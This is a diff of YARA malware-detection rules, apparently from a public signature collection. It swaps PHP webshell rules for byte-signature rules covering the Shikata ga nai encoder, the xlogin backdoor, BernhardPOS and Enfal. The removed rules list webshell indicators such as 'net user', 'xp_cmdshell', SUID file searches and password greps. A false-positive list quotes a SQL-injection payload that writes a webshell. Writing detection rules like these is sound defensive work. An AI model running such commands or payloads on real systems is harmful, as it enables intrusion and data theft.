-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
-		$gen_much_sus93 = "eval(\"/*" wide ascii
-		$gen_much_sus94 = "http_response_code(404)" wide ascii
-		$gif = { 47 49 46 38 }
+		$doc = "d0cf11e0a1b11ae1"
+		$obj = "\\objupdate"
+		$wsdl = "7700730064006c003d00" nocase
+		$http1 = "68007400740070003a002f002f00" nocase
+		$http2 = "680074007400700073003a002f002f00" nocase
+		$http3 = "6600740070003a002f002f00" nocase
 
 	condition:
-		not ( any of ( $gfp* ) ) and not ( any of ( $gfp_tiny* ) ) and ( any of ( $inp* ) ) and ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) and ( filesize < 1000 or ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) )
+		uint32be( 0 ) == 0x7B5C7274 and $obj and $doc and $wsdl and 1 of ( $http* )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Base64_Encoded_Payloads : FILE
+rule SIGNATURE_BASE_Hunting_Rule_Shikataganai
 {
 	meta:
-		description = "php webshell containing base64 encoded payload"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4e42b47d-725b-5e1f-9408-6c6329f60506"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L720-L870"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Steven Miller"
+		id = "fe266a42-0480-5a98-9368-8a18aa5e4f69"
+		date = "2019-10-21"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_shikataganai.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "88d0d4696c9cb2d37d16e330e236cb37cfaec4cd"
-		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
-		hash = "e726cd071915534761822805724c6c6bfe0fcac604a86f09437f03f301512dc5"
-		hash = "39b8871928d00c7de8d950d25bff4cb19bf9bd35942f7fee6e0f397ff42fbaee"
-		hash = "8cc9802769ede56f1139abeaa0735526f781dff3b6c6334795d1d0f19161d076"
-		hash = "4cda0c798908b61ae7f4146c6218d7b7de14cbcd7c839edbdeb547b5ae404cd4"
-		hash = "afd9c9b0df0b2ca119914ea0008fad94de3bd93c6919f226b793464d4441bdf4"
-		hash = "b2048dc30fc7681094a0306a81f4a4cc34f0b35ccce1258c20f4940300397819"
-		hash = "da6af9a4a60e3a484764010fbf1a547c2c0a2791e03fc11618b8fc2605dceb04"
-		hash = "222cd9b208bd24955bcf4f9976f9c14c1d25e29d361d9dcd603d57f1ea2b0aee"
-		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
-		hash = "6b6cd1ef7e78e37cbcca94bfb5f49f763ba2f63ed8b33bc4d7f9e5314c87f646"
-		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
-		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
-		hash = "e2b1dfcfaa61e92526a3a444be6c65330a8db4e692543a421e19711760f6ffe2"
-		logic_hash = "8f606dc3e1e688cca144fe769af50980b4c25fa69b08c67aca8c676a6a060010"
-		score = 75
-		quality = -8
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		logic_hash = "733522cb1d61f4bbb300d73ff21d9d7d10a78aae06e03408fce4b88e4c51f662"
+		score = 50
+		quality = 85
+		tags = ""
+		company = "FireEye"
 
 	strings:
-		$decode1 = "base64_decode" fullword nocase wide ascii
-		$decode2 = "openssl_decrypt" fullword nocase wide ascii
-		$one1 = "leGVj"
-		$one2 = "V4ZW"
-		$one3 = "ZXhlY"
-		$one4 = "UAeABlAGMA"
-		$one5 = "lAHgAZQBjA"
-		$one6 = "ZQB4AGUAYw"
-		$two1 = "zaGVsbF9leGVj"
-		$two2 = "NoZWxsX2V4ZW"
-		$two3 = "c2hlbGxfZXhlY"
-		$two4 = "MAaABlAGwAbABfAGUAeABlAGMA"
-		$two5 = "zAGgAZQBsAGwAXwBlAHgAZQBjA"
-		$two6 = "cwBoAGUAbABsAF8AZQB4AGUAYw"
-		$three1 = "wYXNzdGhyd"
-		$three2 = "Bhc3N0aHJ1"
-		$three3 = "cGFzc3Rocn"
-		$three4 = "AAYQBzAHMAdABoAHIAdQ"
-		$three5 = "wAGEAcwBzAHQAaAByAHUA"
-		$three6 = "cABhAHMAcwB0AGgAcgB1A"
-		$four1 = "zeXN0ZW"
-		$four2 = "N5c3Rlb"
-		$four3 = "c3lzdGVt"
-		$four4 = "MAeQBzAHQAZQBtA"
-		$four5 = "zAHkAcwB0AGUAbQ"
-		$four6 = "cwB5AHMAdABlAG0A"
-		$five1 = "wb3Blb"
-		$five2 = "BvcGVu"
-		$five3 = "cG9wZW"
-		$five4 = "AAbwBwAGUAbg"
-		$five5 = "wAG8AcABlAG4A"
-		$five6 = "cABvAHAAZQBuA"
-		$six1 = "wcm9jX29wZW"
-		$six2 = "Byb2Nfb3Blb"
-		$six3 = "cHJvY19vcGVu"
-		$six4 = "AAcgBvAGMAXwBvAHAAZQBuA"
-		$six5 = "wAHIAbwBjAF8AbwBwAGUAbg"
-		$six6 = "cAByAG8AYwBfAG8AcABlAG4A"
-		$seven1 = "wY250bF9leGVj"
-		$seven2 = "BjbnRsX2V4ZW"
-		$seven3 = "cGNudGxfZXhlY"
-		$seven4 = "AAYwBuAHQAbABfAGUAeABlAGMA"
-		$seven5 = "wAGMAbgB0AGwAXwBlAHgAZQBjA"
-		$seven6 = "cABjAG4AdABsAF8AZQB4AGUAYw"
-		$eight1 = "ldmFs"
-		$eight2 = "V2YW"
-		$eight3 = "ZXZhb"
-		$eight4 = "UAdgBhAGwA"
-		$eight5 = "lAHYAYQBsA"
-		$eight6 = "ZQB2AGEAbA"
-		$nine1 = "hc3Nlcn"
-		$nine2 = "Fzc2Vyd"
-		$nine3 = "YXNzZXJ0"
-		$nine4 = "EAcwBzAGUAcgB0A"
-		$nine5 = "hAHMAcwBlAHIAdA"
-		$nine6 = "YQBzAHMAZQByAHQA"
-		$execu1 = "leGVjd"
-		$execu2 = "V4ZWN1"
-		$execu3 = "ZXhlY3"
-		$esystem1 = "lc3lzdGVt"
-		$esystem2 = "VzeXN0ZW"
-		$esystem3 = "ZXN5c3Rlb"
-		$opening1 = "vcGVuaW5n"
-		$opening2 = "9wZW5pbm"
-		$opening3 = "b3BlbmluZ"
-		$fp1 = { D0 CF 11 E0 A1 B1 1A E1 }
-		$fp2 = "YXBpLnRlbGVncmFtLm9"
-		$fp3 = " GET /"
-		$fp4 = " POST /"
-		$fpa1 = "/cn=Recipients"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
+		$varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
+		$varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
+		$varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
+		$varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
+		$varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
+		$varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
+		$varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
+		$varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
+		$varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
+		$varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
+		$varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
 
 	condition:
-		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not any of ( $fp* ) and any of ( $decode* ) and ( ( any of ( $one* ) and not any of ( $execu* ) ) or any of ( $two* ) or any of ( $three* ) or ( any of ( $four* ) and not any of ( $esystem* ) ) or ( any of ( $five* ) and not any of ( $opening* ) ) or any of ( $six* ) or any of ( $seven* ) or any of ( $eight* ) or any of ( $nine* ) )
+		any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Unknown_1 : FILE
+rule SIGNATURE_BASE_MAL_ELF_Xlogin_Nov24_1 : FILE
 {
 	meta:
-		description = "obfuscated php webshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "93d01a4c-4c18-55d2-b682-68a1f6460889"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L872-L894"
+		description = "Detects xlogin backdoor samples"
+		author = "Florian Roth"
+		id = "e8940660-ecf8-5616-9cb1-fc0a02d35689"
+		date = "2024-11-11"
+		modified = "2024-12-12"
+		reference = "https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_xlogin_nov24.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12ce6c7167b33cc4e8bdec29fb1cfc44ac9487d1"
-		hash = "cf4abbd568ce0c0dfce1f2e4af669ad2"
-		logic_hash = "ce2d4c87c001a45febf7eac5474aa0d24ea73067f9154203ef5653bf77e7028f"
-		score = 75
+		logic_hash = "42fe8a32022592ff976d6d2839d949e28f60c8958f64a20c1c3c9091fb64d31e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "2b09a6811a9d0447f8c6480430eb0f7e3ff64fa933d0b2e8cd6117f38382cc6a"
+		hash2 = "d1cbf80786b1ca1ba2e5c31ec09159be276ad3d10fc0a8a0dbff229d8263ca0a"
+		hash3 = "ff17e9bcc1ed16985713405b95745e47674ec98e3c6c889df797600718a35b2c"
 
 	strings:
-		$sp0 = /^<\?php \$[a-z]{3,30} = '/ wide ascii
-		$sp1 = "=explode(chr(" wide ascii
-		$sp2 = "; if (!function_exists('" wide ascii
-		$sp3 = " = NULL; for(" wide ascii
+		$xc1 = { 6C 6F 67 69 6E 3A 00 25 73 00 00 2F 62 69 6E 2F 73 68 00 2F 74 6D 70 2F 6C 6F 67 69 6E }
+		$s1 = "/tmp/login" ascii fullword
+		$s2 = "npxXoudifFeEgGaACSnmcs[" ascii fullword
+		$sc1 = { 28 6E 69 6C 29 00 00 00 28 6E 75 6C 6C 29 }
 
 	condition:
-		filesize < 300KB and all of ( $sp* )
+		uint16( 0 ) == 0x457f and filesize < 500KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Eval : FILE
+rule SIGNATURE_BASE_Bernhardpos
 {
 	meta:
-		description = "Generic PHP webshell which uses any eval/exec function in the same line with user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "79cfbd88-f6f7-5cba-a325-0a99962139ca"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L896-L955"
+		description = "BernhardPOS Credit Card dumping tool"
+		author = "Nick Hoffman / Jeremy Humble"
+		id = "9b9e1507-cf1b-5653-beaa-458205e367c3"
+		date = "2015-07-14"
+		modified = "2023-12-05"
+		reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bernhard_pos.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a61437a427062756e2221bfb6d58cd62439d09d9"
-		hash = "90c5cc724ec9cf838e4229e5e08955eec4d7bf95"
-		hash = "2b41abc43c5b6c791d4031005bf7c5104a98e98a00ee24620ce3e8e09a78e78f"
-		hash = "5c68a0fa132216213b66a114375b07b08dc0cb729ddcf0a29bff9ca7a22eaaf4"
-		hash = "de3c01f55d5346577922bbf449faaaaa1c8d1aaa64c01e8a1ee8c9d99a41a1be"
-		hash = "124065176d262bde397b1911648cea16a8ff6a4c8ab072168d12bf0662590543"
-		hash = "cd7450f3e5103e68741fd086df221982454fbcb067e93b9cbd8572aead8f319b"
-		hash = "ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521"
-		hash = "31ff9920d401d4fbd5656a4f06c52f1f54258bc42332fc9456265dca7bb4c1ea"
-		hash = "64e6c08aa0b542481b86a91cdf1f50c9e88104a8a4572a8c6bd312a9daeba60e"
-		hash = "80e98e8a3461d7ba15d869b0641cdd21dd5b957a2006c3caeaf6f70a749ca4bb"
-		hash = "93982b8df76080e7ba4520ae4b4db7f3c867f005b3c2f84cb9dff0386e361c35"
-		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
-		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
-		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
-		hash = "fd5f0f81204ca6ca6e93343500400d5853012e88254874fc9f62efe0fde7ab3c"
-		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
-		hash = "6d042b6393669bb4d98213091cabe554ab192a6c916e86c04d06cc2a4ca92c00"
-		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
-		logic_hash = "4b7759e4761f5897bfb5e576df645a2e99cec4e703fb28d0fc275cf8f8848263"
-		score = 75
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash = "e49820ef02ba5308ff84e4c8c12e7c3d"
+		logic_hash = "c00f2fda5a391b44767d918945069f18cef084dd4dc6aa94d8f945bf97ac462a"
+		score = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$geval = /\b(exec|shell_exec|passthru|system|popen|proc_open|pcntl_exec|eval|assert)[\t ]{0,300}(\(base64_decode)?(\(stripslashes)?[\t ]{0,300}(\(trim)?[\t ]{0,300}\(\$(_POST|_GET|_REQUEST|_SERVER\s?\[['"]HTTP_|GLOBALS\[['"]_(POST|GET|REQUEST))/ wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$gfp_3 = " GET /"
-		$gfp_4 = " POST /"
+		$shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? }
+		$mutex_name = "OPSEC_BERNHARD"
+		$build_path = "C:\\bernhard\\Debug\\bernhard.pdb"
+		$string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d }
 
 	condition:
-		filesize < 300KB and not ( any of ( $gfp* ) ) and $geval
+		any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Double_Eval_Tiny : FILE
+rule SIGNATURE_BASE_MAL_Enfal_Nov22 : FILE
 {
 	meta:
-		description = "PHP webshell which probably hides the input inside an eval()ed obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "868db363-83d3-57e2-ac8d-c6125e9bdd64"
-		date = "2021-01-11"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L957-L1008"
+		description = "Detects a certain type of Enfal Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9dcba14e-2175-5da0-8629-5b952c213f6c"
+		date = "2015-02-10"
+		modified = "2023-01-06"
+		old_rule_name = "Enfal_Malware"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_enfal.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f66fb918751acc7b88a17272a044b5242797976c73a6e54ac6b04b02f61e9761"
-		hash = "6b2f0a3bd80019dea536ddbf92df36ab897dd295840cb15bb7b159d0ee2106ff"
-		hash = "aabfd179aaf716929c8b820eefa3c1f613f8dcac"
-		hash = "9780c70bd1c76425d4313ca7a9b89dda77d2c664"
-		hash = "006620d2a701de73d995fc950691665c0692af11"
-		logic_hash = "cf0405e8a44497574d75291bf86bf9413d9a64140e820f7f5a655fe5302c6918"
+		logic_hash = "bf349ba2b7bd635808b4ee23c6286e7dd403fbc185c6b59f0bb1fbf47ba7d9bb"
 		score = 75
-		quality = 17
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash2 = "42fa6241ab94c73c7ab386d600fae70da505d752daab2e61819a0142b531078a"
+		hash2 = "bf433f4264fa3f15f320b35e773e18ebfe94465d864d3f4b2a963c3e5efd39c2"
 
 	strings:
-		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
-		$fp1 = "clone" fullword wide ascii
-		$fp2 = "* @assert" ascii
-		$fp3 = "*@assert" ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$xop1 = { 00 00 83 c9 ff 33 c0 f2 ae f7 d1 49 b8 ff 8f 01 00 2b c1 }
+		$s1 = "POWERPNT.exe" fullword ascii
+		$s2 = "%APPDATA%\\Microsoft\\Windows\\" ascii
+		$s3 = "%HOMEPATH%" fullword ascii
+		$s4 = "Server2008" fullword ascii
+		$s5 = "%ComSpec%" fullword ascii
 
 	condition:
-		filesize > 70 and filesize < 300 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and #payload >= 2 and not any of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC : FILE
+rule SIGNATURE_BASE_Enfal_Malware_Backdoor : FILE
 {
 	meta:
-		description = "PHP webshell obfuscated"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f66e337b-8478-5cd3-b01a-81133edaa8e5"
-		date = "2021-01-12"
-		modified = "2025-09-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1010-L1139"
+		description = "Generic Rule to detect the Enfal Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4631888c-e1e2-5969-a312-0f0011cd605c"
+		date = "2015-02-10"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_enfal.yar#L27-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eec9ac58a1e763f5ea0f7fa249f1fe752047fa60"
-		hash = "181a71c99a4ae13ebd5c94bfc41f9ec534acf61cd33ef5bce5fb2a6f48b65bf4"
-		hash = "76d4e67e13c21662c4b30aab701ce9cdecc8698696979e504c288f20de92aee7"
-		hash = "1d0643927f04cb1133f00aa6c5fa84aaf88e5cf14d7df8291615b402e8ab6dc2"
-		logic_hash = "d300de628add5912955f4915921dc387bd3ca3e7bf327e3d9f0ae82e3839a3ec"
-		score = 75
-		quality = -48
+		logic_hash = "6ce0c19e666cc0db50194bd56f51beddeee22c787b67810655241fdd4d34a31e"
+		score = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
+		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
+		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
 
 	strings:
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$gfp13 = "assert(\\\""
-		$gfp14 = "PhutilUTF8TestCase"
-		$gfp15 = "chr(195).chr(128) => 'A',"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$o1 = "chr(" nocase wide ascii
-		$o2 = "chr (" nocase wide ascii
-		$o3 = "goto" fullword nocase wide ascii
-		$o4 = "\\x9" wide ascii
-		$o5 = "\\x3" wide ascii
-		$o6 = "\\61" wide ascii
